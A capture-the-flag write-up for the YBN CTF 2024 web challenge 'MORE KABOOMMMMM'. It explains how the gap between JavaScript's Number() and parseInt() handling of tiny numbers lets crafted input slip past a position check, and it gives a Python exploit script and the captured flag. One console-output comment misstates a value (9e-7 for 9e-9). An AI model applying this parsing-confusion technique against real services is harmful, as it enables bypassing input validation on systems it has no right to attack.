# MORE KABOOMMMMM Weird `parseInt()` and `Number()` behaviour CTF Challenge (YBN CTF 2024) ### Challenge Details > Title: MORE KABOOMMMMM! \ > Description: The North Korean's are still after Baba for the several war crimes he committed in their country. In order to better optimise the locations of the nukes they drop such that Baba is guaranteed to be hit, they decided to make a helpful UI to determine exactly where the nukes should be dropped! > \ > Baba has managed to successfully infiltrate into their website. He needs to find a way to mess up their website so that the bombs don't land on him. Can you help Baba escape his imminent doom? \ > \ > Attachments: `https://ctf.ybn.sg/files/d536dc1f84ff61aa4dd8c1b56436f5e9/MORE_KABOOOMMMMMMMMMMMMMM.zip` \ > Instance: https://more-kaboommmmm-more-kaboom-chall.ybn.sg/ After unzipping the attachment provided, we should see this: (insert image here) ## TLDR Exploiting `parseInt` behaviour with small numbers ```py import requests url = "https://more-kaboommmmm-more-kaboom-chall.ybn.sg/nuke" json = { "baba": [0.0000000000009, 0.0000000009], "nukes": [ [20, 20], ] } r_0 = requests.post(url, json=json) print(r_0.text) ``` ## Writeup Tree:  In `routes/index.js`, we see this interesting function (routes/index.js: lines 11-51) ```js router.post('/nuke', (req, res) => { // Call the backend script with the provided data const data = req.body; if (!data.baba || !data.nukes) { res.status(400).json({ error: 'Invalid data' }); return } if (data.baba.length !== 2 || data.nukes.some(nuke => nuke.length !== 2)) { res.status(400).json({ error: 'Invalid data' }); return } const {baba,nukes} = data; baba[0] = Number(baba[0]) baba[1] = Number(baba[1]) if (baba[0] < 0 || baba[0] > 20 || baba[1] < 0 || baba[1] > 20){ res.status(400).json({ error: 'Data Out Of Range' }); return } // add an extra nuke at baba's exact position nukes.push(baba) var number_of_nukes_hit = 0 for (let nuke of nukes){ let [x,y] = nuke; x = parseInt(x) y = parseInt(y) if (x < 0 || x > 20 || y < 0 || y > 20){ res.status(400).json({ error: 'Data Out Of Range' }); return } if (Math.abs(baba[0]-x) <= 5 && Math.abs(baba[1]-y) <= 5){ number_of_nukes_hit += 1 } } if (number_of_nukes_hit >= 1){ res.status(200).json({result: `Good Job Comarade. Baba has been successfully nuked! He has suffered a total of ${number_of_nukes_hit} damage.`}); } else { res.status(200).json({result: `Baba is safe. You have failed the motherland. ${flag} `}); } }); ``` Notice that baba's position is being parsed with `Number()` (lines 25-26) while each nuke's position is being parsed with `parseInt()` (lines 35-38). \ Also notice that a nuke is being added to baba's position, so it's impossible to surivive normally (lines 31-33). ```js ... baba[0] = Number(baba[0]) baba[1] = Number(baba[1]) ... // add an extra nuke at baba's exact position nukes.push(baba) var number_of_nukes_hit = 0 ... for (let nuke of nukes){ let [x,y] = nuke; x = parseInt(x) y = parseInt(y) ... } ``` We can exploit this disparity in parsing positions. Let's start with `parseInt()`. In javascript, `parseInt` can grab the first few digits of a number while ignoring the rest of it, like so: ```js console.log(parseInt("774randomstring")) // -> 774 console.log(parseInt(9e-17)) // -> 9 ``` The second case is what I used. If we input a very small number into baba's position, `Number(baba[i])` will evaluate like so: ```js baba = [0.0000009, 0.000000009] baba[0] = Number(baba[0]) baba[1] = Number(baba[1]) console.log(baba[0]) // -> 9e-7 console.log(baba[1]) // -> 9e-7 ``` Therefore, if we input in `baba = [0.0000009, 0.000000009]`, the corresponding nuke will be: ```js console.log(parseInt(baba[0])) // -> 9 console.log(parseInt(baba[1])) // -> 9 ``` Which passes all the checks and makes baba sufficiently far away from the nuke. I wrote this Python script to get the flag: ```py import requests url = "https://more-kaboommmmm-more-kaboom-chall.ybn.sg/nuke" json = { "baba": [0.0000000000009, 0.0000000009], "nukes": [ [20, 20], ] } r_0 = requests.post(url, json=json) print(r_0.text) ``` Which gives  Flag: :::spoiler Flag YBN24{I_10VE_J4vaScR1P7} ::: \ \ \ Main Writeups Page: https://hackmd.io/@ctf-lol/ybnctf2024